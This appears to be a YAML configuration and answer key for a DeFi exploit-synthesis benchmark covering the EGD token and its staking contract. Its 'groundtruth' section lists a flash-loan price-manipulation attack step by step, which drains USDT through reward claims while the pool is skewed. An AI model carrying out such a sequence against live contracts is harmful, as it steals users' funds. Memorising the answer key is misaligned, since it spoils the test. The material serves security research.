# Information for benchmarks building.
project_name: "EGD"

ctrt_name2cls:
  - ["egd", "EGD"]
  - ["usdt", "USDT"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["egdstaking", "EGDStaking"]

ctrt_name2deploy:
  - ["egd", "new EGD()"]
  - ["usdt", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "egdstaking",
      "new EGDStaking(
      address(egd),
      address(usdt),
      address(router),
      address(pair))",
    ]

extra_actions:
  - "function deposit_egdstaking_usdt_egdslp(uint256 amount) internal eurus {
    usdt.approve(address(egdstaking), amount);
    egdstaking.stake(amount);
    vm.warp(block.timestamp + 54);
    }"

  - "function withdraw_egdstaking_egdslp_egd(uint256 amount) internal eurus {
    egdstaking.claimAllReward();
    }"

extra_deployments_before:
  - "egd.afterDeploy(owner, attacker, address(pair), address(egdstaking));"

extra_deployments: []

extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "usdt", "owner", "2100e18"]
  - ["deposit", "egdstaking", "usdt", "egdslp", "100e18"]
  - ["borrow", "usdt", "pair", "424526221219952604636716"]
  - ["withdraw", "egdstaking", "egdslp", "egd", "0"]
  - ["payback", "usdt", "pair", "uint(424526221219952604636716) * 1003 / 1000"]
  - ["swap", "pair", "attacker", "egd", "usdt", "egd.balanceOf(attacker)", "pair.getAmountOut(egd.balanceOf(attacker), address(egd))"]
  - ["payback", "usdt", "owner", "2100e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "egd":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["egd", "usdt"]
    support_swaps:
      "usdt": ["egd", "usdt"]
      "egd": ["egd", "usdt"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true
  "egdstaking":
    is_defientry: true
    hacked_assets: ["egd"]
  "egdslp":
    is_asset: true

pattern: "BuySell Manipulation"
